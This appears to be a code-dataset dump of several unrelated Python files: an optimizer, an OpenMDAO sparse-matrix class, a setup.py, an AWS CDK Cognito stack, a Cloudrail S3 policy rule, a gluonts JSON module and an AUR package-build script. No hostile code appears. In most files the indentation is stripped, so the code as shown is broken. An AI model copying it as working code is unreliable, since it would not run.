denorm_x = np.zeros_like(xr)
for i in range(xr.shape[0]):
denorm_x[i, :] = xr[i] * (self.ub - self.lb) / 100 + self.lb
return denorm_x
def initialize_population(self):
pop_size = (self.population_size, self.num_variables)
self.population = np.random.uniform(
low=self.norm_lb, high=self.norm_ub, size=pop_size)
self.initial_population = self.population
def evaluate_population_cost(self, population):
pop_fobj = []
pop_g = []
# Calculating the fitness value of each solution in the current population.
for sol in population:
cost, g = self.eval_objective(sol)
if((cost < self.best_objective) & (not np.any(g > 0))):
self.best_objective = cost
self.best_solution = sol
pop_fobj.append(cost)
pop_g.append(g)
pop_fobj = np.array(pop_fobj)
pop_g = np.asarray(pop_g)
self.fobj_evals = self.fobj_evals + pop_fobj.shape[0]
self.population_fobj = pop_fobj
self.population_g = pop_g
if(self.callback != None):
self.callback(self.denormalize(population), pop_fobj, pop_g)
return pop_fobj, pop_g
def select_base_vector(self, population, cost):
if(self.base == 'rand'):
r1 = np.random.randint(0, self.population_size)
return r1, population[r1]
elif(self.base == 'mean'):
return None, np.mean(population, axis=0)
elif(self.base == 'best'):
best_idx = np.argmin(cost)
return None, population[best_idx]
else:
raise ValueError('Base={} is not implemented!'.format(self.base))
def select_difference_vector(self, r1, population):
if(self.d == "1"):
r2 = np.random.randint(0, self.population_size)
if(r1 != None):
while(r2 == r1):
r2 = np.random.randint(0, self.population_size)
r3 = np.random.randint(0, self.population_size)
if(r1 != None):
                while (r3 == r1) or (r3 == r2):
r3 = np.random.randint(0, self.population_size)
return population[r2] - population[r3]
else:
raise ValueError(
'd={} is not implemented!'.format(self.d))
def select_scale_factor(self):
return np.random.rand() * 0.5 + 0.5 # U(0.5, 1.0)
def mutate(self, target, scale_factor, difference):
return target + scale_factor * difference
def recombine(self, v, x):
if (self.rec == "bin"):
u_i = []
for i, v_i in enumerate(v):
u_j = []
delta = np.random.randint(0, self.num_variables)
for j in range(self.num_variables):
randnum = np.random.rand()
if((randnum <= self.mutation_prob) | (j == delta)):
u_j.append(v_i[j])
else:
u_j.append(x[i, j])
u_i.append(u_j)
return np.asarray(u_i)
else:
raise ValueError(
'Recombination={} is not implemented!'.format(self.rec))
def validate_bounds(self, x):
xc = []
for i, value in enumerate(x):
if((value < self.norm_lb[i]) | (value > self.norm_ub[i])):
# replace the variable by a random value inside the bounds
xc.append(np.random.rand() *
(self.norm_ub[i] - self.norm_lb[i]) + self.norm_lb[i])
else:
xc.append(value)
return np.asarray(xc)
def eval_objective(self, x):
cost, g = self.fobj(self.denormalize(x).flatten())
return cost, np.asarray(g)
def select_survivors(self, u, x, fx, gx):
survivors = []
for i in range(self.population_size):
u_i = self.validate_bounds(u[i])
gx_i = gx[i]
fx_i = fx[i]
fu, gu = self.eval_objective(u_i)
is_valid = (fu <= fx_i)
# only use the rule for restricted problems
if(len(gu) > 0):
rule1 = np.all(gu <= 0) & np.all(gx_i <= 0) & (fu <= fx_i)
rule2 = np.all(gu <= 0) & np.any(gx_i > 0)
rule3 = np.any(gu > 0) & np.all(np.maximum(gu, np.zeros_like(
gu)) <= np.maximum(gx_i, np.zeros_like(gx_i)))
is_valid = rule1 | rule2 | rule3
if(is_valid):
survivors.append(u_i)
else:
survivors.append(x[i])
return np.asarray(survivors)
def run(self, func, debug=False):
self.reset()
self.fobj = func
self.initialize_population()
for i in range(self.max_generations):
fobj, g = self.evaluate_population_cost(self.population)
v = []
# use penalization for base vector selection only
# fobj_penalized = fobj + 1000 * np.maximum(np.zeros(self.population_size), np.max(np.asarray(g), axis=1))
for _ in range(self.population_size):
r1, base = self.select_base_vector(self.population, None)
difference = self.select_difference_vector(r1, self.population)
scale_factor = self.select_scale_factor()
v.append(self.mutate(base, scale_factor, difference))
v = np.asarray(v)
u = self.recombine(v, self.population)
self.population = self.select_survivors(
u, self.population, fobj, g)
# if(debug == True):
# print('Progress: {:.2f}%'.format(
# 100 * i / self.max_generations))
if((debug == True) & (self.best_objective != np.Infinity)):
print('Best fobj: {}'.format(self.best_objective))
# print('Best sol: {}'.format(
# self.denormalize(self.best_solution)))
if(self.best_objective != np.Infinity):
return self.best_objective, self.denormalize(self.best_solution).flatten()
else:
return np.Infinity, None
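# Minimal usage sketch (objective and bounds are illustrative, not part of the
# module): minimize the sphere function subject to g(x) = 1 - x0 - x1 <= 0.
# The objective passed to run() must return a (cost, constraint_values) tuple.
if __name__ == "__main__":
    def _sphere_constrained(x):
        return float(np.sum(x ** 2)), [1.0 - x[0] - x[1]]
    _de = DifferentialEvolution(lb=[-5.0, -5.0], ub=[5.0, 5.0],
                                pop_size=20, max_generations=50)
    _best_cost, _best_x = _de.run(_sphere_constrained)
    print(_best_cost, _best_x)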
| 2.671875 | 3 |
openmdao/matrices/csr_matrix.py | onodip/OpenMDAO | 0 | 11016 | """Define the CSRmatrix class."""
import numpy as np
from scipy.sparse import coo_matrix
from six import iteritems
from openmdao.matrices.coo_matrix import COOMatrix
class CSRMatrix(COOMatrix):
"""
Sparse matrix in Compressed Row Storage format.
"""
def _build(self, num_rows, num_cols):
"""
Allocate the matrix.
Parameters
----------
num_rows : int
number of rows in the matrix.
num_cols : int
number of cols in the matrix.
"""
data, rows, cols = self._build_sparse(num_rows, num_cols)
# get a set of indices that sorts into row major order
srtidxs = np.lexsort((cols, rows))
data = data[srtidxs]
rows = rows[srtidxs]
cols = cols[srtidxs]
# now sort these back into ascending order (our original stacked order)
# so in _update_submat() we can just extract the individual index
# arrays that will map each block into the combined data array.
revidxs = np.argsort(srtidxs)
metadata = self._metadata
for key, (ind1, ind2, idxs, jac_type, factor) in iteritems(metadata):
if idxs is None:
metadata[key] = (revidxs[ind1:ind2], jac_type, factor)
else:
# apply the reverse index to each part of revidxs so that
# we can avoid copying the index array during updates.
metadata[key] = (revidxs[ind1:ind2][np.argsort(idxs)],
jac_type, factor)
# data array for the CSR will be the same as for the COO since
# it was already in sorted order.
coo = coo_matrix((data, (rows, cols)), shape=(num_rows, num_cols))
coo_data_size = coo.data.size
self._matrix = coo.tocsr()
# make sure data size is the same between coo and csr, else indexing is
# messed up
if coo_data_size != self._matrix.data.size:
raise ValueError("CSR matrix data contains duplicate row/col entries. "
"This would break internal indexing.")
| 2.828125 | 3 |
setup.py | medchemfi/sdfconf | 6 | 11017 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import re
import os
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open("src/sdfconf/_version.py", "rt") as vf:
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
for line in vf:
mo = re.search(VSRE, line, re.M)
if mo:
verstr = mo.group(1)
break
if not mo:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
setup(name = 'sdfconf',
version = verstr,
description = ("Diverse manipulation and analysis tool for .sdf files."),
long_description = read('README.rst'),
install_requires = ['numpy>=1.7.1','matplotlib>=1.4.2'],
author = '<NAME>',
author_email = '<EMAIL>',
maintainer = '<NAME>',
maintainer_email = '<EMAIL>',
packages = ['sdfconf'],
package_dir = {'sdfconf':'src/sdfconf'},
keywords = 'sdf mol2 conformation analyze histogram',
url = 'http://users.jyu.fi/~pentikai/',
license = 'MIT/expat',
entry_points =
{'console_scripts': ['sdfconf = sdfconf.runner:main'],
'setuptools.installation': ['eggsecutable = sdfconf.runner:main',],
},
classifiers= ['Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
#'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Scientific/Engineering :: Chemistry' ,
'Topic :: Software Development :: Libraries',
],
##FIXME
#'''
#package_data = {
# 'sample':['sample_data.sdf']
# },
#'''
) | 1.78125 | 2 |
stacks/cognito_stack.py | adamdubey/devops-serverless-app-aws-cdk | 0 | 11018 | from aws_cdk import (
aws_cognito as cognito,
aws_iam as iam,
aws_ssm as ssm,
core
)
class CognitoStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
prj_name = self.node.try_get_context("project_name")
env_name = self.node.try_get_context("env")
user_pool = cognito.CfnUserPool(self, 'cognitouserpool',
auto_verified_attributes = [
'email'
],
username_attributes = [
'email', 'phone_number'
],
user_pool_name = prj_name + '-user-pool',
schema = [
{
'attributeDataType': 'String',
'name': 'param1',
'mutable': True
}
],
policies = cognito.CfnUserPool.PoliciesProperty(
password_policy = cognito.CfnUserPool.PasswordPolicyProperty(
minimum_length = 10,
require_lowercase = True,
require_numbers = True,
require_symbols = False,
require_uppercase = True
)
)
)
user_pool_client = cognito.CfnUserPoolClient(self, 'pool-client',
user_pool_id = user_pool.ref,
client_name = env_name + '-app-client'
)
identity_pool = cognito.CfnIdentityPool(self, 'identity-pool',
allow_unauthenticated_identities = False,
cognito_identity_providers = [
cognito.CfnIdentityPool.CognitoIdentityProviderProperty(
client_id = user_pool_client.ref,
provider_name = user_pool.attr_provider_name
)
],
identity_pool_name = prj_name + '-identity-pool'
)
ssm.StringParameter(self, 'app-id',
parameter_name = '/' + env_name + '/cognito-app-client-id',
string_value = user_pool_client.ref
)
ssm.StringParameter(self, 'user-pool-id',
parameter_name = '/' + env_name + '/cognito-user-pool-id',
string_value = user_pool_client.user_pool_id
)
ssm.StringParameter(self, 'identity-pool-id',
parameter_name = '/' + env_name + '/cognito-identity-pool-id',
string_value = identity_pool.ref
)
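# Minimal synth sketch (illustrative; the stack id and context values are
# assumptions, not defined by this module):
if __name__ == "__main__":
    app = core.App(context={"project_name": "demo", "env": "dev"})
    CognitoStack(app, "cognito-stack")
    app.synth()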
| 2.015625 | 2 |
cloudrail/knowledge/rules/aws/context_aware/s3_bucket_policy_vpc_endpoint_rule.py | my-devops-info/cloudrail-knowledge | 0 | 11019 | <reponame>my-devops-info/cloudrail-knowledge
from typing import Dict, List
from cloudrail.knowledge.context.aws.iam.policy import S3Policy
from cloudrail.knowledge.context.aws.iam.policy_statement import StatementEffect
from cloudrail.knowledge.context.aws.s3.s3_bucket import S3Bucket
from cloudrail.knowledge.context.aws.ec2.vpc import Vpc
from cloudrail.knowledge.context.aws.ec2.vpc_endpoint import VpcEndpoint
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.rules.aws.aws_base_rule import AwsBaseRule
from cloudrail.knowledge.rules.base_rule import Issue
from cloudrail.knowledge.rules.rule_parameters.base_paramerter import ParameterType
class S3BucketPolicyVpcEndpointRule(AwsBaseRule):
def execute(self, env_context: AwsEnvironmentContext, parameters: Dict[ParameterType, any]) -> List[Issue]:
issues_list: List[Issue] = []
vpc_to_buckets_map: Dict[Vpc, List[S3Bucket]] = self._create_vpc_to_buckets_map(env_context)
for vpc, bucket_list in vpc_to_buckets_map.items():
for s3_vpce in self._filter_by_service_name(vpc):
for bucket in bucket_list:
if bucket.resource_based_policy is None or \
not self._is_restrict_to_s3_vpce(bucket.resource_based_policy, s3_vpce):
issues_list.append(Issue(f"~{bucket.get_type()}~. `{bucket.get_friendly_name()}` is accessible via"
f" VPC endpoint `{s3_vpce.get_friendly_name()}`. "
f"~in VPC~. `{vpc.get_friendly_name()}` "
f"with a policy that is not restricting requests sourced from"
f" a VPC Endpoint.", bucket, bucket))
return issues_list
def get_id(self) -> str:
return "s3_bucket_policy_vpce"
@staticmethod
def _create_vpc_to_buckets_map(env_context: AwsEnvironmentContext) -> Dict[Vpc, List[S3Bucket]]:
region_to_buckets_map: Dict[str, List[S3Bucket]] = {}
vpc_to_buckets_map: Dict[Vpc, List[S3Bucket]] = {}
for bucket in env_context.s3_buckets:
if not bucket.is_public:
if bucket.region not in region_to_buckets_map:
region_to_buckets_map[bucket.region] = []
region_to_buckets_map[bucket.region].append(bucket)
for vpc in env_context.vpcs.values():
if vpc.region in region_to_buckets_map:
vpc_to_buckets_map[vpc] = region_to_buckets_map[vpc.region]
return vpc_to_buckets_map
@staticmethod
def _is_restrict_to_s3_vpce(policy: S3Policy, s3_vpce: VpcEndpoint) -> bool:
for statement in policy.statements:
expected_operator_prefix: str = "String" if statement.effect == StatementEffect.ALLOW else "StringNot"
for condition_block in statement.condition_block:
if condition_block.operator.startswith(expected_operator_prefix) and \
condition_block.key == "aws:SourceVpce" and \
s3_vpce.vpce_id in condition_block.values:
return True
return False
@staticmethod
def _filter_by_service_name(vpc: Vpc, service_name: str = "s3"):
return [s3_vpce for s3_vpce in vpc.endpoints if s3_vpce.service_name.endswith(f".{service_name}")]
def should_run_rule(self, environment_context: AwsEnvironmentContext) -> bool:
return bool(environment_context.s3_buckets)
| 1.921875 | 2 |
src/gluonts/core/serde/_json.py | PascalIversen/gluon-ts | 1 | 11020 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
JSON Serialization/Deserialization
----------------------------------
The canonical way to do this is to define the `default` and `object_hook`
parameters to the json.dumps and json.loads methods. Unfortunately, due
to https://bugs.python.org/issue12657 this is not possible at the moment,
as support for custom NamedTuple serialization is broken.
To circumvent the issue, we pass the input value through custom encode
and decode functions that map nested object terms to JSON-serializable
data structures with explicit recursion.
"""
import json
from typing import Any, Optional
from ._base import encode, decode
def dump_json(o: Any, indent: Optional[int] = None) -> str:
"""
Serializes an object to a JSON string.
Parameters
----------
o
The object to serialize.
indent
        An optional number of spaces to use as an indent.
Returns
-------
str
A string representing the object in JSON format.
See Also
--------
load_json
Inverse function.
"""
return json.dumps(encode(o), indent=indent, sort_keys=True)
def load_json(s: str) -> Any:
"""
Deserializes an object from a JSON string.
Parameters
----------
s
A string representing the object in JSON format.
Returns
-------
Any
The deserialized object.
See Also
--------
dump_json
Inverse function.
"""
return decode(json.loads(s))
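# Round-trip sketch (illustrative): plain JSON-compatible values pass through
# encode/decode unchanged, so dump_json followed by load_json restores them.
if __name__ == "__main__":
    payload = {"name": "demo", "values": [1, 2, 3]}
    text = dump_json(payload, indent=2)
    print(load_json(text) == payload)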
| 3.40625 | 3 |
run.py | Aisbergg/docker-image-arch-aur-makepkg | 7 | 11021 | <gh_stars>1-10
#!/usr/bin/python3
import argparse
import os
import sys
import re
import shutil
import tempfile
import pwd
import grp
import tarfile
import time
import glob
import urllib.request
from subprocess import Popen, PIPE
import aur
import pacman
local_source_dir = '/makepkg/local_src'
build_dir = os.path.abspath('/makepkg/build')
pacman_cache_dir = '/var/cache/pacman/pkg'
accepted_architectures = ['any', 'x86_64', 'i686']
packages_in_cache = None
packages_in_offical_repositories = None
class ConsoleColors:
blue = '\033[94m'
green = '\033[92m'
red = '\033[91m'
yellow = '\033[93m'
reset = '\033[0m'
class InvalidPackageSourceError(Exception):
"""Invalid package source exception.
Args:
message (str): Message passed with the exception
"""
def __init__(self, message):
super().__init__(message)
class NoSuchPackageError(Exception):
"""No such package exception.
Args:
message (str): Message passed with the exception
"""
def __init__(self, message):
super().__init__(message)
def printInfo(message):
"""Print a colorful info message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.blue + message + ConsoleColors.reset)
def printSuccessfull(message):
"""Print a colorful successfull message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.green + message + ConsoleColors.reset)
def printWarning(message):
"""Print a colorful warning message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.yellow + message + ConsoleColors.reset)
def printError(message):
"""Print a colorful error message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.red + message + ConsoleColors.reset)
class PackageRepository:
"""Represents an enum of all package repositories."""
CORE = "core"
EXTRA = "extra"
COMMUNITY = "community"
MULTILIB = "multilib"
AUR = "aur"
LOCAL = "local"
class PackageBase:
"""Base class for pacman packages and their sources.
Args:
name (str): Name of the Arch Linux package
"""
name = None
version = None
architecture = None
repository = None
dependencies = []
license = None
# is a cached version of this package available
# 0: not available
# 1: different version(s) available
# 2: same version available
cache_available = 0
# True if this package needs to be installed before a dependent package can
# be build
is_make_dependency = False
# status of the installtion
# -2: dependency failed to install
# -1: failed to install
# 0: is not installed
# 1: is installed
# 2: different version is installed
# 3: successfully installed
installation_status = 0
# store for errors
error_info = None
def __init__(self, name):
self.name = name
def _check_if_cache_is_available(self):
# check if same version is available
name = '{0}-{1}-{2}.pkg.tar.xz'.format(
self.name, self.version, self.architecture)
if name in packages_in_cache:
self.cache_available = 2
return
# check if different version is available
else:
regex_different = re.compile(r'{0}-(\S+)-{1}.pkg.tar.xz'.format(
self.name, self.architecture))
for cache_file in packages_in_cache:
match = regex_different.search(os.path.basename(cache_file))
if match:
self.cache_available = 1
return
self.cache_available = 0
def get_installation_status(self):
"""Get the installation status of the package."""
if pacman.is_installed(self.name):
pcm_info = pacman.get_info(self.name)
if pcm_info['Version'] == self.version:
self.installation_status = 1
else:
self.installation_status = 2
else:
self.installation_status = 0
class PacmanPackage(PackageBase):
"""Represents a pacman package from a official repository.
Args:
name (str): Name of the pacman package
"""
def __init__(self, name):
super().__init__(name)
try:
self._get_package_info()
self._check_if_cache_is_available()
self.get_installation_status()
except Exception as e:
self.error_info = e
def _get_package_info(self):
"""Get the needed package information."""
is_available = False
for pcm_info in packages_in_offical_repositories:
if pcm_info['id'] == self.name:
is_available = True
break
if is_available:
pkg_info = pacman.get_info(self.name)
self.version = pkg_info['Version']
self.architecture = pkg_info['Architecture']
if 'Repository' in pkg_info:
if pkg_info['Repository'] == PackageRepository.EXTRA:
self.repository = PackageRepository.EXTRA
elif pkg_info['Repository'] == PackageRepository.CORE:
self.repository = PackageRepository.CORE
elif pkg_info['Repository'] == PackageRepository.COMMUNITY:
self.repository = PackageRepository.COMMUNITY
elif pkg_info['Repository'] == PackageRepository.MULTILIB:
self.repository = PackageRepository.MULTILIB
else:
self.repository = PackageRepository.EXTRA
self.dependencies = pkg_info['Depends On'].split(' ')
self.license = pkg_info['Licenses']
else:
raise NoSuchPackageError(
"No package with the name '{0}' exists in the official repositories".format(self.name))
def install(self):
"""Install the Pacman package."""
if not (self.installation_status == 1 or self.installation_status == 3):
printInfo("Installing package {0} {1}...".format(
self.name, self.version))
rc, out, err = run_command(['pacman', '-S', '--force', '--needed',
'--noconfirm', '--noprogressbar',
'--ignore', 'package-query', '--ignore',
'pacman-mirrorlist', '--cachedir',
pacman_cache_dir, self.name])
if rc != 0:
self.installation_status = -1
self.error_info = Exception(
"Failed to install package {0}: {1}".format(self.name, '\n'.join(err)))
else:
self.installation_status = 3
class PackageSource(PackageBase):
"""Represents a source of a package.
Args:
name (str): Name of the package
remove_dowloaded_source (bool): If True remove the source downloaded by 'makepkg' before build. If False
the sources will be kept, under the condition that the source is of the same
version of the package to be build
local_source_path (str): Local path of the source. If 'None' the pckage will be fetched from the AUR
"""
# path that contains the package source
path = None
# the dependencies that need to be installed prior build
make_dependencies = []
# is marked as an explicit build, so it is not a dependency of another
# package
explicit_build = False
# the status of the build
# 0: not yet build
# 1: successfully build
# 2: skipped build
# 3: failed to build
# 4: make dependency failed
build_status = 0
# If True remove the source downloaded by 'makepkg' before build. If False
# the sources will be kept, under the condition that the source is of the same
# version of the package to be build
remove_dowloaded_source = False
# package source is build from git repository
build_from_git = False
# package source is build from git repository
split_package_names = None
def __init__(self, name, remove_dowloaded_source, local_source_path=None):
super().__init__(name)
self.remove_dowloaded_source = remove_dowloaded_source
try:
# is local source package
if local_source_path:
self.repository = PackageRepository.LOCAL
self.path = os.path.abspath(local_source_path)
# is AUR package
else:
self.repository = PackageRepository.AUR
self._download_aur_package_source()
self._parse_pkgbuild_file()
self._check_if_cache_is_available()
self.get_installation_status()
except Exception as e:
self.error_info = e
def _parse_from_string(self, name, string):
"""Parse a bash variable value from a string.
Args:
name (str): Name of the variable to be parsed
string (str): String containing the bash variables
Returns:
str. Value for given params
list. Value for given params
None. If given param wasn't found
"""
# search for array like value
match = re.compile(r'{0}=\(([^\)]*)\)'.format(name),
re.DOTALL).search(string)
if match:
m = match.group(1).replace('\n', '').replace('"', '').replace('\'', '')
return [x.strip('\"\'') for x in re.compile(r'\s').split(m) if x != '']
else:
# search for simple string value
match = re.compile(r'{0}=(.+)'.format(name)).search(string)
if match:
return match.group(1).strip('\"\' ')
return None
def _get_dependencies_from_alias(self, dep_alias_names):
"""Get the real package names if only an alias was supplied.
Args:
dep_alias_names (list): (Alias-)Names of the packages
Returns:
list. Real names of the packages
"""
dependencies = []
if dep_alias_names:
for dep_alias_name in dep_alias_names:
dep_alias_name = re.sub(r'(.+?)(<|<=|>|>=){1}.*?$', r'\1',
dep_alias_name)
rc, out, err = run_command(['package-query', '-QSiif', '%n', dep_alias_name], print_output=False)
if rc == 0:
dependencies.append(out[-1])
else:
dependencies.append(dep_alias_name)
return dependencies
def _parse_pkgbuild_file(self):
"""Parse package information from PKGBUILD file."""
pkgbuild_file = os.path.join(self.path, "PKGBUILD")
with open(pkgbuild_file, 'r') as f:
file_content = f.read()
# package name
pkgbase = self._parse_from_string('pkgbase', file_content)
if pkgbase:
self.name = pkgbase
split_package_names = self._parse_from_string('pkgname', file_content)
self.split_package_names = []
for spn in split_package_names:
self.split_package_names.append(
re.sub(r'\$\{{0,1}[A-Za-z_][A-Za-z0-9_]*\}{0,1}',
pkgbase, spn, flags=re.IGNORECASE))
else:
self.name = self._parse_from_string('pkgname', file_content)
self.build_from_git = self.name.endswith('-git')
# package version (combined with release)
version = self._parse_from_string('pkgver', file_content)
release = self._parse_from_string('pkgrel', file_content)
self.version = version + '-' + release
# package architecture
architectures = self._parse_from_string('arch', file_content)
for ac_arch in accepted_architectures:
if ac_arch in architectures:
self.architecture = ac_arch
break
if not self.architecture:
raise InvalidPackageSourceError(
"Architecture of the package '{0}' is not supported".format(os.path.basename(self.path)))
# package license
self.license = self._parse_from_string('license', file_content)
if type(self.license) == list:
self.license = self.license[0]
# raise an error if PKGBUILD file does not contain mandatory variables
if not self.name or \
not version or \
not release or \
not self.architecture or \
not self.license:
raise InvalidPackageSourceError(
"One or more mandatory variables (name, version, release, architecture, license) in the package '{0}' is missing".format(os.path.basename(self.path)))
# package dependencies
self.dependencies = self._get_dependencies_from_alias(
self._parse_from_string('depends', file_content))
# package make dependencies
self.make_dependencies = self._get_dependencies_from_alias(
self._parse_from_string('makedepends', file_content))
# package repository
self.repository = PackageRepository.LOCAL
def _copy_source_to_build_dir(self):
"""Copy the package source to the build dir."""
pkg_build_dir = os.path.join(build_dir, self.name)
if os.path.exists(pkg_build_dir) and \
os.path.isdir(pkg_build_dir) and \
(not self.remove_dowloaded_source or not self.build_from_git):
old_pkgbuild_file = os.path.join(pkg_build_dir,
'PKGBUILD')
if os.path.exists(old_pkgbuild_file) and \
os.path.isfile(old_pkgbuild_file):
try:
old_pkg_source = PackageSource(
self.name, False, pkg_build_dir)
if old_pkg_source.version == self.version:
if self.repository == PackageRepository.AUR:
shutil.rmtree(self.path, ignore_errors=True)
self.path = pkg_build_dir
return
except:
pass
shutil.rmtree(pkg_build_dir, ignore_errors=True)
shutil.copytree(self.path, pkg_build_dir)
if self.repository == PackageRepository.AUR:
shutil.rmtree(self.path, ignore_errors=True)
self.path = pkg_build_dir
def _download_aur_package_source(self):
"""Fetch package source from the AUR."""
aur_pkg_download_path = tempfile.mkdtemp()
try:
i = aur.info(self.name)
except:
raise NoSuchPackageError(
"No package with the name '{0}' exists in the AUR".format(self.name))
pkg_tar_file_path = os.path.join(aur_pkg_download_path,
i.name + ".tar.gz")
# download package sources from AUR
urllib.request.urlretrieve("https://aur.archlinux.org" +
i.url_path,
pkg_tar_file_path)
# extract source tarball
tar = tarfile.open(pkg_tar_file_path)
tar.extractall(path=aur_pkg_download_path)
tar.close()
os.remove(pkg_tar_file_path)
self.path = os.path.join(aur_pkg_download_path, os.listdir(aur_pkg_download_path)[0])
def makepkg(self, uid, gid):
"""Run makepkg.
Args:
uid (int): UID of the build user
gid (int): GID of the build user
Returns:
            bool. True if the build was successful, False if not
"""
self._copy_source_to_build_dir()
# set uid and gid of the build dir
os.chown(self.path, uid, gid)
for root, dirs, files in os.walk(self.path):
for f in dirs + files:
                full_path = os.path.join(root, f)
                if os.path.isfile(full_path) or os.path.isdir(full_path):
                    os.chown(full_path, uid, gid)
printInfo("Building package {0} {1}...".format(
self.name, self.version))
os.chdir(self.path)
rc, out, err = run_command(['makepkg', '--force', '--nodeps', '--noconfirm'], uid)
if rc != 0:
self.error_info = Exception("Failed to build package '{0}': {1}".format(
self.name, '\n'.join(err)))
return False
        # get new version info when built from git
if self.build_from_git:
git_pkg = PackageSource(
self.name, False, self.path)
self.version = git_pkg.version
for pkg_file in glob.glob(os.path.join(self.path, '*.pkg.tar.xz')):
pkg_dest = os.path.join(pacman_cache_dir, os.path.basename(pkg_file))
# move created package to Pacman package cache
shutil.move(pkg_file, pkg_dest)
# set uid and gid of the build package
os.chown(pkg_dest, 0, 0)
if self.is_make_dependency:
self.install()
return True
def get_package_file_name(self):
"""Get the pacman package file name.
Returns:
            str. The file name of the built pacman package
"""
return '{0}-{1}-{2}.pkg.tar.xz'.format(
self.name, self.version, self.architecture)
def get_all_dependencies(self):
"""Get dependencies and make dependencies together.
Returns:
list. Names of all dependencies
"""
return self.dependencies + self.make_dependencies
def install(self):
"""Install the build package."""
if not (self.installation_status == 1 or self.installation_status == 3)\
and (self.build_status == 1 or self.build_status == 2):
pkg_names = [self.name]
            # different names if the package is a split package
if self.split_package_names:
pkg_names = self.split_package_names
for pkg_name in pkg_names:
printInfo("Installing package {0} {1}...".format(
pkg_name, self.version))
rc, out, err = run_command(
['pacman', '-U', '--noconfirm', '--force', '--ignore',
'package-query', '--ignore', 'pacman-mirrorlist',
'--cachedir', pacman_cache_dir, os.path.join(
pacman_cache_dir, '{0}-{1}-{2}.pkg.tar.xz'.format(
pkg_name, self.version, self.architecture))])
if rc != 0:
self.installation_status = -1
self.error_info = Exception(
"Failed to install package '{0}': {1}".format(pkg_name, '\n'.join(err)))
return False
self.installation_status = 3
def change_user(uid):
"""Temporarily change the UID and GID for code execution."""
def set_uid_and_guid():
os.setuid(uid)
return set_uid_and_guid
def run_command(command, uid=None, print_output=True):
"""Run a command in a subprocess.
Args:
command (string): Command to run
uid (int): UID of the user to run with
print_output (bool): True if the output should be printed to stdout and stderr
Returns:
        (int, list, list). Return code of the subprocess, stdout and stderr
"""
if uid:
process = Popen(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, preexec_fn=change_user(uid))
else:
process = Popen(command, stdout=PIPE, stderr=PIPE, universal_newlines=True)
if print_output:
err = []
out = []
while True:
tmp = process.stdout.readline()
if tmp:
tmp = tmp.rstrip('\n ')
if tmp != '':
out.append(tmp)
print(tmp)
if process.poll() is not None:
break
time.sleep(.05)
for line in process.stdout.readlines():
tmp = line.rstrip('\n ')
out.append(tmp)
print(tmp)
rc = process.poll()
if rc != 0:
for line in process.stderr.readlines():
tmp = line.rstrip('\n ')
printError(tmp)
err.append(tmp)
return (rc, out, err)
else:
out, err = process.communicate()
rc = process.returncode
return (rc, out.splitlines(), err.splitlines())
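# Illustrative usage of run_command (a sketch with assumed arguments, not part
# of the original script):
#
#   rc, out, err = run_command(['pacman', '-Q', 'bash'], print_output=False)
#   if rc == 0:
#       print(out[0])      # e.g. "bash 5.0.007-1"
#   else:
#       printError('\n'.join(err))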
def get_package_recursive(pkg_name,
explicit_build,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
is_make_dependency):
"""Get a package and all their dependencies.
Args:
pkg_name (str): Name of the package
explicit_build (bool): True if package source is given by the user
pkg_dict (dict): Store for package information
locally_available_package_sources (list): List of all locally available package sources
remove_dowloaded_source (bool): If True remove the source downloaded by 'makepkg' before build. If False
the sources will be kept, under the condition that the source is of the same
                                        version as the package to be built
is_make_dependency (bool): True if package shall be installed as a make dependency
"""
# check if package is already in pkg_dict
if pkg_name in pkg_dict:
return
# check if package is in official repo
for pcm_info in packages_in_offical_repositories:
if pcm_info['id'] == pkg_name:
pcm_pkg = PacmanPackage(pkg_name)
pcm_pkg.is_make_dependency = is_make_dependency
pkg_dict[pkg_name] = pcm_pkg
return
# check if package source is locally available
if pkg_name in locally_available_package_sources:
pkg_path = os.path.join(local_source_dir, pkg_name)
lcl_pkg = PackageSource(pkg_name, remove_dowloaded_source, pkg_path)
if lcl_pkg.name in pkg_dict:
return
lcl_pkg.explicit_build = explicit_build
        lcl_pkg.is_make_dependency = is_make_dependency
pkg_dict[pkg_name] = lcl_pkg
        # if this is a split package the name can differ
pkg_dict[lcl_pkg.name] = lcl_pkg
if not lcl_pkg.error_info:
for dependency in lcl_pkg.dependencies:
get_package_recursive(dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True if is_make_dependency else False)
for make_dependency in lcl_pkg.make_dependencies:
get_package_recursive(make_dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True)
# check for the package in the AUR
else:
aur_pkg = PackageSource(pkg_name, remove_dowloaded_source, None)
if aur_pkg.name in pkg_dict:
return
aur_pkg.explicit_build = explicit_build
pkg_dict[pkg_name] = aur_pkg
        # if this is a split package the name can differ
pkg_dict[aur_pkg.name] = aur_pkg
if not aur_pkg.error_info:
for dependency in aur_pkg.dependencies:
get_package_recursive(dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True if is_make_dependency else False)
for make_dependency in aur_pkg.make_dependencies:
get_package_recursive(make_dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True)
